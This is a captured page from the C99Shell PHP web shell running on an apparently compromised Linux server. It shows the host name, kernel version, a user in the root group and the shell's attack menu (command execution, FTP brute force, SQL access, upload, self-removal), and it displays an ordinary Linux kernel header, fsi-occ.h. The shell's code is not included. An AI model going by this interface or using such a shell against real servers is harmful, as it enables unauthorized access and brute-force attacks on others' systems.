!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/src/linux-headers-5.15.0-153/include/linux/   drwxr-xr-x
Free 28.81 GB of 117.98 GB (24.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     fsi-occ.h (681 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// SPDX-License-Identifier: GPL-2.0

#ifndef LINUX_FSI_OCC_H
#define LINUX_FSI_OCC_H

struct device;

#define OCC_RESP_CMD_IN_PRG        0xFF
#define OCC_RESP_SUCCESS        0
#define OCC_RESP_CMD_INVAL        0x11
#define OCC_RESP_CMD_LEN_INVAL        0x12
#define OCC_RESP_DATA_INVAL        0x13
#define OCC_RESP_CHKSUM_ERR        0x14
#define OCC_RESP_INT_ERR        0x15
#define OCC_RESP_BAD_STATE        0x16
#define OCC_RESP_CRIT_EXCEPT        0xE0
#define OCC_RESP_CRIT_INIT        0xE1
#define OCC_RESP_CRIT_WATCHDOG        0xE2
#define OCC_RESP_CRIT_OCB        0xE3
#define OCC_RESP_CRIT_HW        0xE4

int fsi_occ_submit(struct device *dev, const void *request, size_t req_len,
           void *response, size_t *resp_len);

#endif /* LINUX_FSI_OCC_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--